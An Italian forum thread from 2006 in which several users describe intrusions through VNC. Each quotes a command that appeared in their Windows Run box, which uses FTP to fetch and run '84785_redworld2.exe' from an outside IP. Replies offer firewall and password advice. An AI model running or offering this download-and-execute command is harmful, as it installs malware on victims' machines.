Punto informatico Network
Login Esegui login | Non sei registrato? Iscriviti ora (è gratuito!)
Username: Password:
  • Annuncio Pubblicitario

Strana Stringa In "ESEGUI"

Un virus si è intromesso nel tuo computer? Vuoi navigare in tutta sicurezza? Sono sicure le transazione online? Come impedire a malintenzionati di intromettersi nel tuo pc? Come proteggere i tuoi dati? Qui trovi le risposte a queste ed altre domande

Strana Stringa In "ESEGUI"

Messaggioda panzateo » lun set 18, 2006 6:50 am

Ciao a tutti,

Premetto che sono uno smanettone, e che per lavoro ho installato nel computer il no-ip, il vnc (con password), RDP abilitato e non ho firewall [fischio] [fischio] [fischio] .
Come Antivirus uso il kasperski, con anti spyware l'a2suared, e ho xp pro sp2 aggiornato a venerdi scorso.

Ok, ora vi spiego cosa è successo:
ieri pomeriggio mentre la mia morosa era davanti al computer il mouse è partito e gli si è spostato, poi si è aperta la finestra START-->ESEGUI, ed è incominciata a comparire questa stringa:

cmd.exe /c echo open 82.53.83.223 19858>x&echo get 84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del x&exit

lei era convinta che fossi io collegato da remoto, finche non gli si è aperto il command e non sono tornato a casa. ora ho attivato il firewall di XP, secondo voi che caspita è successo???
Grazie Matteo.
Avatar utente
panzateo
Neo Iscritto
Neo Iscritto
 
Messaggi: 16
Iscritto il: mar mag 18, 2004 8:18 pm
Località: Emilia Romagna

Messaggioda crazy.cat » lun set 18, 2006 7:27 am

Intanto metterei un firewall vero e non quello di xp.
Qualcuno era entrato, oppure hai un virus nascosto che cercava di uscire.
Bisognerebbe conoscere il significato delle opzioni presenti in quel comando.
Avatar utente
crazy.cat
MLI Hero
MLI Hero
 
Messaggi: 30959
Iscritto il: lun gen 12, 2004 1:38 pm
Località: Mestre

Messaggioda panzateo » lun set 18, 2006 11:54 am

Ok, per il firewall piu buono, ma se apro le porte del vnc il problema si ripresenta??? [cry+]
Per il momento ho disattivato il vnc, e fatto scansioni con av e antispy, senza trovare nulla di anomalo, speriamo bene.

Sapete se per caso il vnc ha delle password di default???
Avatar utente
panzateo
Neo Iscritto
Neo Iscritto
 
Messaggi: 16
Iscritto il: mar mag 18, 2004 8:18 pm
Località: Emilia Romagna


Messaggioda crazy.cat » lun set 18, 2006 12:21 pm

Cambia la password di vnc e metti qualcosa di molto complicato, lettere e numeri insieme.
Non dovrebbe avere password di default, ma non posso confermartelo.
Avatar utente
crazy.cat
MLI Hero
MLI Hero
 
Messaggi: 30959
Iscritto il: lun gen 12, 2004 1:38 pm
Località: Mestre

Messaggioda CerMa » mer set 20, 2006 10:47 pm

Ciao, mi sono appena registrato.
Sono interessato alla questione perché anche io ha lo stesso problema.
stringa praticamente identica, a parte il mio IP ovviamente. Se non ho inteso male, il comando apre una connessione FTP con l'esterno, io uso NOD32 e non ho rilevato virus. In comune abbiamo la presenza di VNC attivo.
Il firewall di XP non fa praticamente niente; l'ho configurato in mille modi ma non sono riuscito a risolvere niente. ho anche provato a filtrare bene le porte tramite router ma nada. [cry]
Sono dunque arrivato alla conclusione che il soggetto passi attraverso le porte VNC, che sono la 5900 per le conn remote tramite programma e 5800 per le connessioni remote web-based tramite tecnologia Java.[boxed]
Io per ora ho cambiato la porta di defaul del Java mettendone una a caso e probabilmente chiusa dal mio router. e non stò avendo problemi [cry]
Se guardi nella cartella del tuo utente troverai il file eseguibile redworld2 e un file di nome x da 1 byte. Io li ho eliminati manualmente tutte le volte ma non ho risolto niente.
N.B. anche io zero firewall. [fischio]
Fatemi sapere se si risolve qualcosa, intanto io le tento tutte.
P.S. Ho beccato l'IP di partenza delle connessione, e risulta esseere un IP di Kiev [:I]
Avatar utente
CerMa
Neo Iscritto
Neo Iscritto
 
Messaggi: 1
Iscritto il: mer set 20, 2006 10:36 pm
Località: Iseo (BS)

Messaggioda buffy2601 » gio set 28, 2006 6:07 am

Ciao a tutti, ho letto che non sono il solo ad avere questo problema, anche a me all'improvviso è apparso il comando esegui con la seguente stringa"cmd /c echo OPEN 83.176.xx.19x 7082>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit", insomma x un secondo non ho avuto più il controllo del computer! Ho anche io Vnc e Noip, appena successo ho subito cambiato password su Vnc ma è successo ancora, almeno 3 volte!! Come firewall ho il Sygate 5.5 e antivirus Kaspersky. Qualcuno ha qualche soluzione!! Grazie a tutti in anticipo!!!
Avatar utente
buffy2601
Neo Iscritto
Neo Iscritto
 
Messaggi: 1
Iscritto il: gio set 28, 2006 5:58 am

Messaggioda BilloKenobi » gio set 28, 2006 6:23 am

dovrebbe essere una connessione in uscita, quindi il firewall di xp non la blocca (funziona solo in entrata)

non è la prima volta che sento di un computer bucato con vnc... mi piace poco quel programma, se fossi in voi lo userei solo se proprio strettissimamente necessario

ho anche letto di un utonto che lo teneva aperto senza password, e uno l'ha beccato, ma l'ha solo avvisato con un messaggio via notepad
Begun the Clone War has
Avatar utente
BilloKenobi
Senior Member
Senior Member
 
Messaggi: 453
Iscritto il: gio ago 10, 2006 11:06 am

Messaggioda crazy.cat » gio set 28, 2006 9:09 pm

buffy2601 ha scritto:Come firewall ho il Sygate 5.5 e antivirus Kaspersky. Qualcuno ha qualche soluzione!! Grazie a tutti in anticipo!!!

Cambia firewall, sygate è troppo vecchio.
Ne ho disinstallati due ultimamente che erano stati sfondati alla grande ed era passato di tutto.
Avatar utente
crazy.cat
MLI Hero
MLI Hero
 
Messaggi: 30959
Iscritto il: lun gen 12, 2004 1:38 pm
Località: Mestre

Messaggioda asiasolar » lun gen 21, 2008 9:43 pm

Consiglio di non usare VNC rende il PC vulnerabile se non c'è installato un buon firewall.
asia
Avatar utente
asiasolar
Neo Iscritto
Neo Iscritto
 
Messaggi: 7
Iscritto il: lun ago 30, 2004 4:22 pm
Località: Friuli


Torna a Sicurezza

Chi c’è in linea

Visitano il forum: Nessuno e 17 ospiti

cron
Powered by phpBB © 2002, 2005, 2007, 2008 phpBB Group
Traduzione Italiana phpBB.it

megalab.it: testata telematica quotidiana registrata al Tribunale di Cosenza n. 22/09 del 13.08.2009, editore Master New Media S.r.l.; © Copyright 2008 Master New Media S.r.l. a socio unico - P.I. 02947530784. GRUPPO EDIZIONI MASTER Spa Tutti i diritti sono riservati. Per la pubblicità: Master Advertising